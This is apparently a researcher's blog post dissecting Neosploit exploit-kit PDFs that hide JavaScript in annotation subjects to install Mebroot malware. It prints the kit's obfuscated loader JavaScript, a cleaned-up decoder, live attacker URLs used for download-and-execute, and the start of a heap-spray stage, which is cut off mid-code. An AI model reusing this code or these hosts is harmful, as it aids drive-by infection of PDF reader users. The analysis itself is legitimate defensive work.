Since around October 2009, Neosploit¹, a black-market exploit toolkit, has been fabricating PDF files in a slightly new way, but in a way which is difficult for many parsers to analyze for maliciousness. In summary, all of the metadata in a PDF is accessible from the Acrobat Javascript environment. And this metadata is being used for obscuring embedded Javascript code. A PDF parser would need to fill in all the document objects with the correct data, and evaluate the Javascript to find the exploit. (Needless to say, many PDF signature parsers don't do this.) These malicious PDFs ultimately install Mebroot (aka: Sinowal)².
[And, oh yeah, our product detects this.]
Breaking News
Update: There's another exploit toolkit doing similar metadata tricks to obscure a CVE-2009-4324 attack. (That's the most recent 0-day.)
I'm going to use this for most of my examples (warning: live as of this writing):
google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.php
The Wepawet Analysis
The Virus Total Analysis on the downloaded EXE (56a6e96863f6dc0c5c5c64fca6bd3c52)
A Brief Word about Neosploit¹
Like some other toolkits, you can only hit the first exploit page once per source IP. It returns a 404 if you try to fetch it again. The Javascript is broken up into multiple chunks, fetched by the first chunk, deobfuscated, reassembled, and executed. The URI is slightly polymorphic. For example, all of these are really the same program on the server:
google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.exe
google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.php
google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.py
google.com.analytics.eicyxtaecun.com/nte/TREST11 .asp
google.com.analytics.eicyxtaecun.com/nte/TREST11.exe
google.com.analytics.eicyxtaecun.com/nte/TREST11.html
google.com.analytics.eicyxtaecun.com/nte/TREST11.php
google.com.analytics.eicyxtaecun.com/nte/TREST11.py
[etc.]
Any file starting with "j" appears to be Javascript, "e" appears to be EXEs, and "o" are the polymorphically generated exploit PDFs. Observe:
eH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948320: PE32 executable for MS Windows (DLL)
jH999a4551V0100f070006R00000000102Td2dcca7b201L656e2d75730000000000K91a68948: ASCII text, with very long lines
oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317: PDF document, version 1.3
The filename is composed of several fields of hexadecimal value, with separators which are not in the set [0-9a-f] (case sensitive, "F" is a valid separator). From the above example:
j H999a4551 V0100f070006 R00000000102 Td2dcca7b 2 01 L656e2d75730000000000 K91a68948
e H999a4551 V0100f070006 R00000000102 Td2dcca7d 2 01 l0409 K91a68948320
o H999a4551 V0100f070006 R00000000102 Td2dcca7d 2 01 l0409 K91a68948317
The "2 01" is the browser version, "L656e2d75730000000000" means "en-us" I haven't bothered to figure out the rest yet.
This is the first chunk of Javascript that hits your browser. If you started from, say http://dgvlvhhytlta.com/nte/GNH4.exe it would fetch the next chunk (the variable
) from pums
. These stages are not on the Wepawet analysis I mentioned above, so I'm including them here for completeness.http://dgvlvhhytlta.com/nte/GNH4.exe/jH999a4551V0100f070006
&hellip
<html>
<head>
<script>
function nerot(o6v28_IX_KM, D5___o){var O_Pp6_l = arguments.callee;O_Pp6_l = O_Pp6_l.toString();var X6q8_bl = 0;var U_a8___ej = "a" + "f";var Ghc62j5r1Wr8P = document.getElementById(U_a8___ej);if (Ghc62j5r1Wr8P) {if (!D5___o) {D5___o = Ghc62j5r1Wr8P.value;}}X6q8_bl++;X6q8_bl++;var firot = new Array();if (o6v28_IX_KM) { firot = o6v28_IX_KM;} else {var tk_048_6R_6CyPe = 0;var ScS1Bncy_d_8 = 0;var G_2__3A_r = 512;var gw55F_B__BBV2 = 49;gw55F_B__BBV2--;while(ScS1Bncy_d_8 < O_Pp6_l.length) {var G_sv_c7x6qjTn = 1;var m8d_GS__whx = O_Pp6_l.charCodeAt(ScS1Bncy_d_8);if (m8d_GS__whx >= gw55F_B__BBV2 && m8d_GS__whx <= (gw55F_B__BBV2 + 9)) {if (tk_048_6R_6CyPe == 4) { tk_048_6R_6CyPe = 0; }if (isNaN(firot[tk_048_6R_6CyPe])) { firot[tk_048_6R_6CyPe] = 0; }firot[tk_048_6R_6CyPe] += m8d_GS__whx;if (firot[tk_048_6R_6CyPe] > G_2__3A_r) {firot[tk_048_6R_6CyPe] -= G_2__3A_r;}tk_048_6R_6CyPe++;}ScS1Bncy_d_8++;}}tk_048_6R_6CyPe = 4;while (tk_048_6R_6CyPe > 0) {if (firot[tk_048_6R_6CyPe - 1] > 256) {firot[tk_048_6R_6CyPe - 1] -= 256;}tk_048_6R_6CyPe--;}var QmyQ7eL0R = 0;var x1Kf_448jleM42 = "";var sp__yv_2g_K04cp = 0;var j_G1g_1 = 0;var T__D6_r = 0;var y_6A__C_u;var pdbpQb = 0;while(j_G1g_1 < D5___o.length) {var T_B203hvS__Wvt = D5___o.substr(j_G1g_1, 1) + "J";var Pbukfx_2f7D__1w = parseInt(T_B203hvS__Wvt, 16);if (T__D6_r) {y_6A__C_u += Pbukfx_2f7D__1w;if (QmyQ7eL0R == 4) {QmyQ7eL0R -= 4;}var iJ_d_Qth = y_6A__C_u;iJ_d_Qth = iJ_d_Qth - (pdbpQb + 2) * firot[QmyQ7eL0R];if (iJ_d_Qth < 0) {var xgY5uT7__QoL = Math.floor(iJ_d_Qth / 256);iJ_d_Qth = iJ_d_Qth - xgY5uT7__QoL * 256;}iJ_d_Qth = String.fromCharCode(iJ_d_Qth);if (X6q8_bl == 1) {x1Kf_448jleM42 += Pbukfx_2f7D__1w;} else if (X6q8_bl == 2) {x1Kf_448jleM42 += iJ_d_Qth;} else {x1Kf_448jleM42 += j_G1g_1;}QmyQ7eL0R++;pdbpQb++;T__D6_r = 0;} else {y_6A__C_u = Pbukfx_2f7D__1w * 16;T__D6_r = 1;}j_G1g_1++;};;eval(x1Kf_448jleM42);return 0;}
</script>
</head>
<body onload="nerot() ;"
<input type="hidden" id="aa" value="1">
<input type="hidden" id="af" value="F2D096B1BB5AA764CBE6B0E3B18 [&hellip] 745A6F">
<input type="hidden" id="ab" value="1">
</body>
</html>
And the second chunk:
var pums = 'C8763EB09A160F5F0AC4C
… EB76';
Find The Pattern
Here's some names of generated PDFs, I've broken the names up into, what I believe are, separate fields. See if you can find the pattern. None of these is obviously an IP address. (I checked for that.)
AVORP1TREST11.exe/o U2773a43b H918373c0 V03007f35002 R8d56bfa1108 Tdac6495d Q000002fc900801 F0020000a J11000601l0409 Kfa01dcdb317: PDF document, version 1.3
AVORP1TREST11.php/o Hf7b12f26 V0100f060006Rf53e765c102 Tbcf2d195204 l0409 K98c2615b317: PDF document, version 1.3
AVORP1TREST11.py/o H999a4551 V0100f070006R00000000102 Td2dcca7d201 l0409 K91a68948317: PDF document, version 1.3
AVORP1TREST11.py/o H9efd3f2d V03006f35002Rf53e765c102 Td5b83f0c Q000002fa901801 F0020000a J11000601 l0409 K5b7f0e41317: PDF document, version 1.3
TREST11 .asp/o H47834891 V0100f060006 R89a36f9c102 T0cc787be203l0409 K07105315317: PDF document, version 1.3
TREST11 .asp/o H91b0de2f V0100f070006 R8f56bc05102 Tdaf42f62201l0404 K544d4bfe317: PDF document, version 1.3
TREST11 .asp/o Ha98d29bd V0100f060006 R89a36f9c102 Te2cb340e204l0409 K4b290413317: PDF document, version 1.3
TREST11 .asp/o He22f9c5c V03007f35002 R8d56bfa1102 Ta96aa0ae Q000002fc901801 F000c000a J10000601 l0409 Kc5ceb2bf317: PDF document, version 1.3
TREST11 .asp/o Hf7ba1c39 V03005f35002 Rf53e765c102 Tbcff3946 Q000002fd901801 F0020000a J11000601 l0409 K4e3afa12317: PDF document, version 1.3
TREST11.exe/o H30847807 V0100f060006 R89a36f9c102 T7bc0ed53203l0409 K7b4d501b317: PDF document, version 1.3
TREST11.exe/o H3ebec388 V03007f35002 Rf53e765c102 T75fbc09a Q000002fc901801 F002a000a J11000601 l0409 Kaa9ea783317: PDF document, version 1.3
TREST11.exe/o H82fea487 V0100f080006 Rf53e765c102 Tc9bb26de201l0409 Kfee4acbe317: PDF document, version 1.3
TREST11.html/o H8b9e4040 V03007f35002 Rf53e765c102 Tc0db4487 Q000002fd901801 F002a000a J11000601 l0409 K575b6c55317: PDF document, version 1.3
TREST11.html/o H9ee97623 V03006f35002 Rf53e765c108 Td5ad4a05 Q000002fd900801 F0020000a J11000601 l0409 K539b6710317: PDF document, version 1.3
TREST11.html/o Ha98d29bd V0100f060006 Rf53e765c102 Te2cb34e5204 l0409K35e5f3e5317: PDF document, version 1.3
TREST11.html/o Hd6a7ae5c V0100f080006 Rf53e765c102 T9de446b5201 l0409Kab6a7970317: PDF document, version 1.3
TREST11.php/o H47834891 V0100f060006 Rf53e765c102 T0cc6cd94203 l0409K6c8c5ba1317: PDF document, version 1.3
TREST11.php/o Hdfab3f7e V0100f080006 R8d56bfa110a T94ee748e201 l0409K678f4226317: PDF document, version 1.3
TREST11.php/o Hff15790b V03006f35002 Rf53e765c10a Tb4506ce8 Q000002fc901801 F002a000a J00000000 l0409 Kadd89d89317: PDF document, version 1.3
TREST11.py/o H28d77e41 V0100f060006 R7bd67009102 T63951338203 l0409 K3c732e33317: PDF document, version 1.3
TREST11.py/o H9ef9bb5c V03007f35002 Rf53e765c102 Td5bdef71 Q000002fc901801 F0020000a J11000601 l0409 Kd3978d8b317: PDF document, version 1.3
TREST11.py/o Hde8a192b V0100f060006 R8f56bc05102 T95cf8f5f203 l0409 K6f2c23ff317: PDF document, version 1.3
TREST11.py/o He5441011 V0100f070006 R89a36f9c102 Tae012b23201 l0804 Ka373855f317: PDF document, version 1.3
TREST11.py/o Hf9287a3c V03006f35002 Rf53e765c10a Tb26c5103 Q000002fc900801 F0020000a J00000000 l0409 Kf8aab2d0317: PDF document, version 1.3
TREST11.py/o Hfb50394b V03007f35002 Rf53e765c102 Tb0152511 Q00000000901801 F002a000a J11000601 l0409 K77546b04317: PDF document, version 1.3
chrisbecfiis.com/nte/AVORP1TREST1.py/eH999a4551V0100f070006R00000000102Td2b6e14c201l0409K816c9c70320: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
cjbtiybcpnf.com/nte/trest11.py/eH999a4551V0100f070006R00000000102Td2a93f54201l0409320: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.py/eH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948320: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
I guess that's more than a brief word.
How To Speak PDF
The PDF itself is rather clean and easy to read³, so I'll step you through it here.
First4, Acrobat checks if the first line is %PDF-1.something
, and the last line is %%EOF
. The second and third lines from the end are the offset (in bytes) to the cross reference table — the list of objects in the file — and the word
. Somewhere near all that, is the trailer dictionary, which says there are nine objects in this file.startxref
The Cross Reference table [xref] is consulted, it says there are nine objects in this table, and that…
Object #1 starts at byte offset 17. (0x11)
Object #2 starts at offset 93. (0x5D), etc…
It's possible to have multiple xref tables by design, so that PDF files can be incrementally updated. [The purpose of this is so that a PDF reader can find each object quickly, without needing to scan the entire file first to locate it, and without needing to rewrite the entire file just to edit something.]
xref
0 9
← This table references objects 0 through 9
0000000000 65535 f
← A "Free" (Deleted) Object; Generation 65535 means never reuse this number
0000000017 00000 n
← Object 1 starts at offset 17 bytes
0000000093 00000 n
← Object 2 starts at offset 93 bytes
0000000134 00000 n
← Object 3 starts at offset 134 bytes
⇑ Generation number goes up by one for any object number freed and reused.
[etc.]
0000000411 00000 n
← Object 7 starts at offset 411 bytes
0000000641 00000 n
← Object 8 (9th counting from 0)
trailer<</Size 9/Root 1 0 R>> ← Nine objects, Object 1 is the top of the document object tree (The /Catalog object).
startxref
9323
← Offset toabovexref
%EOF
Offset Examples
00000000 25 50 44 46 2d 31 2e 33 0d 0a 25 b1 b3 f3 ce 0d |%PDF-1.3..%.....|
00000010 0a 31 20 30 20 6f 62 6a 3c 3c 2f 54 79 70 65 2f |.1 0 obj<</Type/|
⇑ Byte 17 (0x11) is a "1"
[…]
00000040 20 52 2f 4f 70 65 6e 41 63 74 69 6f 6e 20 36 20 | R/OpenAction 6 |
00000050 30 20 52 3e 3e 65 6e 64 6f 62 6a 0d 0a 32 20 30 |0 R>>endobj..2 0|
⇑ Byte 93 (0x5D) is a "2"
00000060 20 6f 62 6a 3c 3c 2f 54 79 70 65 2f 4f 75 74 6c | obj<</Type/Outl|
[…]
00002450 ff 03 a2 65 8b 77 0d 0a 65 6e 64 73 74 72 65 61 |...e.w..endstrea|
00002460 6d 0d 0a 65 6e 64 6f 62 6a 0d 0a 78 72 65 66 0d |m..endobj..xref.|
⇑ Byte 9323. (0x246B) is a "xref"
00002470 0a 30 20 39 0d 0a 30 30 30 30 30 30 30 30 30 30 |.0 9..0000000000|
The comment near the beginning of the file, the four bytes with their high bits set, is a way to warn most systems where there is a distinction between 'text' and 'binary' modes for files, that this file is going to be 'binary'.
Brief Syntax Guide
- Anything between
%
and end-of-line is a comment. - Anything between
()
's is a literal string. - Anything starting with a
/
is a Name. - Anything inside of
[]
's is an array. - Anything inside of
stream endstream
is data stream (think of it as a very large string constant or blob). - Anything inside of
<<>>
is a dictionary (name-value pairs, like this:<</Type /foo /Thingy 123456>>
) - Indirect objects are defined like Object_Number Version
obj
Stuffendobj
. For example:123 45 obj(I'm a literal string)endobj
. - An indirect can be used — Referenced — from anywhere else that a normal object (string, integer, etc.) would go, by simply writing the object number and version number followed by an
R
. For example:123 45 R
substitutes for that literal string in the example above. - Every useful dictionary object has an entry for what
/Type
it is. For example, the/Catalog
type is used for the document tree root, and/Font
is used for font objects.
That Neosploit PDF
Object #1 (The Catalog object) says that…
Object #2 is the top of the Outline tree (that side panel in your PDF viewer)…
Object #3 is the top of the Page tree…
And to perform the action in Object #6 when the document is opened.
Object #2 says there really isn't an outline for this document.
Object #3 says there is one page in the tree, which is Object #4 .
Object #6 says to execute the Javascript in Object #7.
Object #4 is the descendant of Object #3. It says the page size is 612x792 points (or 8.5x11 inches), and that it contains an Annotation, with the annotation details in Object #5…
Object #5 says that Object #8 is the Subject of this Annotation (The sekret Javascript exploit code).
These are the good parts:
Object #7 is the Javascript that's executed upon document open. It's a decoder for the Javascript hidden in…
Object #8 The Annotation Subject string, a large blob of encoded Javascript.
In PDF-Speak
%PDF-1.3
%
→ Four bytes between 0x80 and 0xFF
1 0 obj<</Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 6 0 R>>endobj
2 0 obj<</Type/Outlines/Count 0>>endobj
3 0 obj<</Type/Pages/Kids[4 0 R]/Count 1>>endobj
4 0 obj<</Type/Page /Annots[ 5 0 R ]/Parent 3 0 R/MediaBox [0 0 612 792]>>endobj
5 0 obj<</Type/Annot /Subtype /Text /Name /Comment/Rect[25 100 60 115] /Subj 8 0 R>>endobj
6 0 obj<</Type/Action/S/JavaScript/JS 7 0 R>>endobj
7 0 obj<</Length 158/Filter/FlateDecode>>
stream
— The zlib compressed data goes here —
endstream
endobj
8 0 obj<</Length 8609/Filter/FlateDecode>>
stream
— The other zlib compressed data goes here —
endstream
endobj
xref
0 9
0000000000 65535 f
0000000017 00000 n
0000000093 00000 n
0000000134 00000 n
0000000184 00000 n
0000000266 00000 n
0000000358 00000 n
0000000411 00000 n
0000000641 00000 n
trailer<</Size 9/Root 1 0 R>>
startxref
9323
%EOF
Analysis
The /FlateDecode
streams are compressed with the deflate algorithm, the exact same one used in PKZip, gzip, and PNG.
If you're trapped on a desert island, with only primitive Unix tools. You can just slap a gzip header onto the beginning of the zlib compressed blob, and use gunzip to decompress it. (Don't forget to add four bytes to the end for the length.)
$ echo -ne "\x1f\x8b\x08\x00BLAH" > example.gz$ cat stream7 >> example.gz
$ echo -ne "\x00\x00\x00\x00" >> example.gz
$ zcat example.gz |less
zcat: example.gz: invalid compressed data--crc error
zcat: example.gz: invalid compressed data--length error
var z; var y; z = y = app.doc;
y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, '%'); s = unescape (l) ;eval(s); s = ''; z = 1;
Hey look! It's Javascript!
This trick only works as long as bit 5 of the second byte of the zlib stream is not set. (Which I've not seen in a PDF stream yet.) I'd explain why this works, but this blog post is too long already. Compare RFC1950 Section 2.2 vs. RFC1952 Section 2.3 if you really want to know. You can also decompress the stream with a pencil and paper too if you don't have a computer. It's not that difficult, just remember that the bits in each octet are reversed from how they look in rfc1951 (Why are y'all looking at me like that? I had to fix a corrupt zip file…)
Otherwise use xpdf or Didier Stevens' tool(s) like a normal person.
pdftosrc oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317 7pdftosrc oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317 8 python pdf-parser.py -f oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317
Back to the PDF
This is the uncompressed stream from Object #7
Almost every PDF I've examind so far has this exact same code in Object #7. (There's apparently a newer version of the toolkit which is doing a little bit of obfuscation to this block.)
var z; var y; z = y = app.doc;
y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, '%'); s = unescape (l) ;eval(s); s = ''; z = 1;
[This getAnnots()
usage is completely unrelated to CVE-2009-1492]
The uncompressed stream from Object #8; The subject of this annotation, and second stage of Javascript, is:
z0dz0az0dz0az09z66z75z6ez63z74z69z
[…]
The
characters are replaced by z
, and then the whole thing %
unescape()
'd. I've seen other variants use
, y
, or g
, and a little more obfuscation of the code above.h
More obfuscation from a different Neosploit toolkit
For Example:
var z+-; ar y;
var h = 'edvoazcl';
z = y = app[h.replace(/[aviezjl]/g, '')];
var tmp = 'syncAEEotScan'; y = 0; z[tmp.replace(/E/g, 'n')](); y = z; var p = y.getAnnots ( { nPage: 0 }) ; var s = p[0]; s = s['sub' + 'ject']; var l = s.replace(/[zhyg]/g, '%') ; s = unescape ( l ) ;app[h.replace(/[czomdqs]/g, '')]( s);
s = ''; z = 1;
The 'y' characters are replced by '%', and then the whole thing unescaped.
s.replace(/[zhyg]/g, '%')
y0dy0ay0dy0ay09y66y75y6ey63y74y69y6fy6ey20y58y36y5fy5fy34y6by33y56y64y4ay56y62y30y49y64y28y76y5fy5fy4dy61y78y6ay2cy20y70y30y5fy59y32y54y29y7by76y61y72y20y73y5fy5fy5fy51y33y35y68y
[...]
About syncAnnotScan and getAnnots
12.5.6.4 Text Annotations
A text annotation represents a “sticky note” attached to a point in the PDF document. When closed, the annotation shall appear as an icon; when open, it shall display a pop-up window containing the text of the note in a font and size chosen by the conforming reader. Text annotations shall not scale and rotate with the page; they shall behave as if the NoZoom and NoRotate annotation flags (see Table 165) were always set. Table 172 shows the annotation dictionary entries specific to this type of annotation.
— From the PDF 1.7 Reference ISO 32000-1:2008.
So let's take a look at that annotation object again:
5 0 obj <<
/Type/Annot
/Subtype /Text
← This is a Text Annotation
/Name /Comment
← Default to a Comment-Style Icon for display
/Rect[25 100 60 115]
← Location of the annotation on page.
/Subj 8 0 R
← Subject is that object full of encoded Javascript
>>endobj
- /Subj
- Text representing a short description of the subject being addressed by the annotation. ISO 32000-1
The getAnnots()
function returns an array of annotation objects, and accepts an associative array with the following possible labels [ibid.]:
nPage
- A 0-based page number. If not set, all pages that match filter.
nSortBy
- A sort method applied to the array. (by Page, Author, Moddate, etc.)
bReverse
- If true, causes the array to be reverse sorted with respect to nSortBy.
nFilterBy
- Gets only annotations satisfying certain criteria. (Printable, viewable, editable, etc.)
Contrast this with getAnnot() which returns a single Annot object by name.
Example
// From the Acrobat JavaScript Scripting Reference
// All annotations on the first page, in reverse order by author.
var annots = this.getAnnots({
nPage:0,
nSortBy: ANSB_Author,
bReverse: true
});
Cleaned Up Code With Commentary
var z;var y;
z = y = app.doc;
y = 0;
z.syncAnnotScan ( ); // Acrobat scans for annotations in the
// document, as a background task.
// This function blocks until all of the
// annotations in the document have been found.
y = z;
var p = y.getAnnots( { nPage: 0 }) ; // This is the new technique.
// getAnnots() returns a list of annotation
// objects. (For the first page in this case)
var s = p[0].subject; // Get the subject from the first annotation
// object.
var l = s.replace(/z/g, '%'); // The 'z' characters are replaced by '%'
s = unescape (l) ; // and then the whole thing unescape()'d
eval(s); // Run the second stage Javascript
s = '';
z = 1;
The Next Part
The third layer of this Javascript onion will decode the next part
differently, depending on whether or not the
object is defined. (It is defined inside of Acrobat Reader, but not within most any other ECMAScript/Javascript engines.) If your parser doesn't get a "2" out of this:app
try {
if (app) {
magic_value = 2;
}
} catch(e) {
}
Then it's going toeval()
gibberish. If decoded correctly it does a heap spray, and exploitsCollab.collectEmailInfo()
The shellcode does HTTP download and execute from:
http://google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.py/eH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948320
… What Virustotal says about it: 56a6e96863f6dc0c5c5c64fca6bd3c52 (It's Mebroot).
function X6__4k3VdJVb0Id(v__Maxj, p0_Y2T){var s___Q35hFa = arguments.callee;var a4__LfE__5a6 = 0;var Do_
YD6N_7p40_r = 512;s___Q35hFa = s___Q35hFa.toString();try {if (app) {a4__LfE__5a6 = 3;a4__LfE__5a6--;}} catch(e)
{ }var M8I2Nb0IWaPT7 = new Array();if (v__Maxj) { M8I2Nb0IWaPT7 = v__Maxj;} else {var s4_AeGcS_Ru807 = 0;var OKD
_8Y_tjg = 0;var a_i_qruF1_u = 49;a_i_qruF1_u--;while(OKD_8Y_tjg < s___Q35hFa.length) {var hYE0g_2_q = 1;var rTb_
w_VCb55 = s___Q35hFa.charCodeAt(OKD_8Y_tjg);if (rTb_w_VCb55 >= a_i_qruF1_u && rTb_w_VCb55 <= (a_i_qruF1_u + 9))
{if (s4_AeGcS_Ru807 == 4) { s4_AeGcS_Ru807 = 0; }if (isNaN(M8I2Nb0IWaPT7[s4_AeGcS_Ru807])) { M8I2Nb0IWaPT7[s4_Ae
GcS_Ru807] = 0; }M8I2Nb0IWaPT7[s4_AeGcS_Ru807] += rTb_w_VCb55;if (M8I2Nb0IWaPT7[s4_AeGcS_Ru807] > Do_YD6N_7p40_r
) {M8I2Nb0IWaPT7[s4_AeGcS_Ru807] -= Do_YD6N_7p40_r;}s4_AeGcS_Ru807++;}OKD_8Y_tjg++;}}s4_AeGcS_Ru807 = 4;Do_YD6N
7p40_r = 256;while (s4_AeGcS_Ru807 > 0) {var OKD_8Y_tjg = s4_AeGcS_Ru807 - 1;if (M8I2Nb0IWaPT7[OKD_8Y_tjg] > Do_
YD6N_7p40_r) {M8I2Nb0IWaPT7[OKD_8Y_tjg] -= Do_YD6N_7p40_r;}s4_AeGcS_Ru807--;}var F_kH_v = 0;var eG76_l = "";var
JtRA2__j_Ae = 0;var GbFYrkx_PbnQ6f6 = 0;var J8_i60lnd = 0;var ltqGwaY;var I1_EB__2_wf = 0;while(GbFYrkx_PbnQ6f6
< p0_Y2T.length) {var c_Y4Ti = p0_Y2T.substr(GbFYrkx_PbnQ6f6, 1) + "J";var A_8_QHs1s = parseInt(c_Y4Ti, 16);if (
J8_i60lnd) {ltqGwaY += A_8_QHs1s;if (F_kH_v == 4) {F_kH_v -= 4;}var uYND0Nm = ltqGwaY;uYND0Nm = uYND0Nm - (I1_EB
__2_wf + 2) * M8I2Nb0IWaPT7[F_kH_v];if (uYND0Nm < 0) {var OF0F_A6__nLc = Math.floor(uYND0Nm / 256);uYND0Nm = uYN
D0Nm - OF0F_A6__nLc * 256;}uYND0Nm = String.fromCharCode(uYND0Nm);if (a4__LfE__5a6 == 1) {eG76_l += A_8_QHs1s;}
else if (a4__LfE__5a6 == 2) {eG76_l += uYND0Nm;} else {eG76_l += GbFYrkx_PbnQ6f6;}F_kH_v++;I1_EB__2_wf++;J8_i60l
nd = 0;} else {ltqGwaY = A_8_QHs1s * 16;J8_i60lnd = 1;}GbFYrkx_PbnQ6f6++;}eval(eG76_l);return 0;}
X6__4k3VdJVb0Id(0, "10E5E67437933DC36719A1A5A4B40DA4D8A9BBB4DF662A054BCC55EF7CB512E4914F603DD828A821C29
376A3786906F5F3D1C7FB1B98C73DC440954C8F67BAA4FF217C877A39684B01CFBE5C8F36FE309A3E5DD3D532ACC81E69E13B6A05123AA30
741E0DF8121A15D9705C7546E167C3324D8FF4D50A44245B7A9E4533E67484B643C17F54A584CC4320BEECC7C5B852A3F6C5816DA6D2C613
FF28F8BD8E2BE22DCF4A4F26284F81BBAC4CBA451041AAE6864F24E34A4C6885BE54890631A3C1D9A58CAE71C894FD047FA667F3F7D99B7C
[…]B9647DC9");
Howto Deobfuscate
Ya'know, if you wanted to…
The obfuscation in this case is just a search and replace with random variable names, so just search and replace them back to something meaningful.
- Replace ";" with ";\n" and "}\n" to prettyprint.
- When you see var M8I2Nb0IWaPT7 = new Array(); you can rename M8I2Nb0IWaPT7 to something more meaningful like "array1".
- When you see eval(eG76_l); you can rename eG76_l to something like evaluated_string.
- When you see for(var 6R_6CyPe=0;6R_6CyPe<0x_17x5;6R_6CyPe+=2){ you can say, oh hey, 6R_6CyPe is an index, and 0x_17x5 is the loop count
- charCodeAt(index) returns a byte
- p0_Y2T.substr and s___Q35hFa.length are strings, so rename apropriately
- function X6__4k3VdJVb0Id( is a function, so rename apropriately
- while(OKD_8Y_tjg < s___Q35hFa.length){ OKD_8Y_tjg++; well it's a good guess that OKD_8Y_tjg is a loop index.
- Use common sense to make the Javascript ledgible to humans. (None of this matters if you're a machine.)
The Javascript, gets a copy of itself (the blob of code being eval()'d) using arguments.callee; which is hashes into a four byte key. I just added a…
var callee = unescape('%66%75%6e%63%74%69%6f%6e%20%58%36%5f
[...] %6e%20%30%3b%7d');
of the original obfuscated code (just up to the %09
(TAB) character), and repaced arguments.callee.toString()
with callee
.
function decode(arg1, arg2_hex){//var argarg = arguments.callee; var argarg = callee; // that unescape() I mentioned //var threethings = 0; // Original
var threethings = 2; // Who cares that app is missing?
var fivetwelve = 512;
argarg = argarg.toString();
try {
if (app) {
threethings = 3;
threethings--; // So you mean 2 then
}
} catch(e) {
}
var array1 = new Array();
if (arg1) {
array1 = arg1;
} else {
var fourthings = 0;
var index = 0;
var fourtynine = 49;
fourtynine--; // ok 48 then (it's for ASCII "0")
while(index < argarg.length) {
var hYE0g_2_q = 1; // unused
var input_byte = argarg.charCodeAt(index);
// In set of [0-9]
if (input_byte >= fourtynine && input_byte <= (fourtynine + 9)) {
if (fourthings == 4) {
fourthings = 0;
}
if (isNaN(array1[fourthings])) {
array1[fourthings] = 0;
}
array1[fourthings] += input_byte;
// keep total from getting too big
if (array1[fourthings] > fivetwelve) {
array1[fourthings] -= fivetwelve;
}
fourthings++;
} // if
index++;
} // while
} // if
print(array1); // 154,315,117,92
fourthings = 4;
fivetwelve = 256;
while (fourthings > 0) {
var index = fourthings - 1;
// keep to a byte
if (array1[index] > fivetwelve) { //256
array1[index] -= fivetwelve; //256
}
fourthings--;
} // while
var indexmod4 = 0;
var evaluated = "";
var JtRA2__j_Ae = 0; // unused
var index2 = 0;
var flag = 0;
var accumulator;
var index3 = 0;
while(index2 < arg2_hex.length) {
// var c_Y4Ti = arg2_hex.substr(index2, 1) + "J";
var c_Y4Ti = arg2_hex.substr(index2, 1) ;
var parsedint = parseInt(c_Y4Ti, 16);
if (flag) {
accumulator += parsedint;
if (indexmod4 == 4) {
indexmod4 -= 4;
}
var lotsomath = accumulator;
lotsomath = lotsomath - (index3 + 2) * array1[indexmod4];
if (lotsomath < 0) {
var mod256 = Math.floor(lotsomath / 256);
lotsomath = lotsomath - mod256 * 256;
}
if (threethings == 1) {
evaluated += parsedint; // This should never run
} else if (threethings == 2) {
evaluated += lotsomath; // This is the only line that actually decrypts
} else {
evaluated += index2; // This should never run
}
indexmod4++;
index3++;
flag = 0;
} else {
accumulator = parsedint * 16;
flag = 1;
} // while
index2++;
} // while
eval(evaluated);
return 0;
}
The Next Part After That
And finally, we've made it to the crunchy center of this metaphor. This does the heap spray, and exploits Collab.collectEmailInfo()
. Nothing really new here.
ar I8tR_yfW_B_G_4 = new Array();var co3L10RH0e_sDj = 0;var k_IbUu = "";function w4U_ES(QnE1DcNMb, c_i4I__W){var LHE7_u = c_i4I__W.toString();var b1oTk__25tEY4 = "";for(var S8_T83_ajR = 0; S8_T83_ajR < LHE7_u.length; S8_T83_ajR++) {var ksHn4MF6Hh4cHia = parseInt(LHE7_u.substr(S8_T83_ajR, 1));if (!isNaN(ksHn4MF6Hh4cHia)) {ksHn4MF6Hh4cHia = ksHn4MF6Hh4cHia.toString(16);if (ksHn4MF6Hh4cHia.length == 1) { ksHn4MF6Hh4cHia = "0" + ksHn4MF6Hh4cHia; }else if (ksHn4MF6Hh4cHia.length != 2) { ksHn4MF6Hh4cHia = "00"; }b1oTk__25tEY4 = ksHn4MF6Hh4cHia + b1oTk__25tEY4;}}while(b1oTk__25tEY4.length < 8) { b1oTk__25tEY4 = "0" + b1oTk__25tEY4; }var k__7_H1 = QnE1DcNMb.toString(16);if (k__7_H1.length == 1) { k__7_H1 = "0" + k__7_H1; }else if (k__7_H1.length != 2) { k__7_H1 = "00"; }b1oTk__25tEY4 = "3" + k__7_H1 + "P" + b1oTk__25tEY4;return b1oTk__25tEY4;}function Bsv_7_w_r_Vmg(H_O610_85G, G_Rp3BOccXCA){var A_p_p7p2__u2x = new Array("");var nd__8__O_E6 = H_O610_85G;var O86U_8;if ((O86U_8 = H_O610_85G.lastIndexOf("%u00")) != -1) {if (O86U_8 + 6 == H_O610_85G.length) {A_p_p7p2__u2x[0] = H_O610_85G.substr(O86U_8 + 4, 2);nd__8__O_E6 = H_O610_85G.substring(0, O86U_8);}}O86U_8 = 1;for (S8_T83_ajR = 0; S8_T83_ajR < G_Rp3BOccXCA.length; S8_T83_ajR++) {var aD3K_EP_v_WML61 = G_Rp3BOccXCA.charCodeAt(S8_T83_ajR).toString(16);if (aD3K_EP_v_WML61.length == 1) { aD3K_EP_v_WML61 = "0" + aD3K_EP_v_WML61; 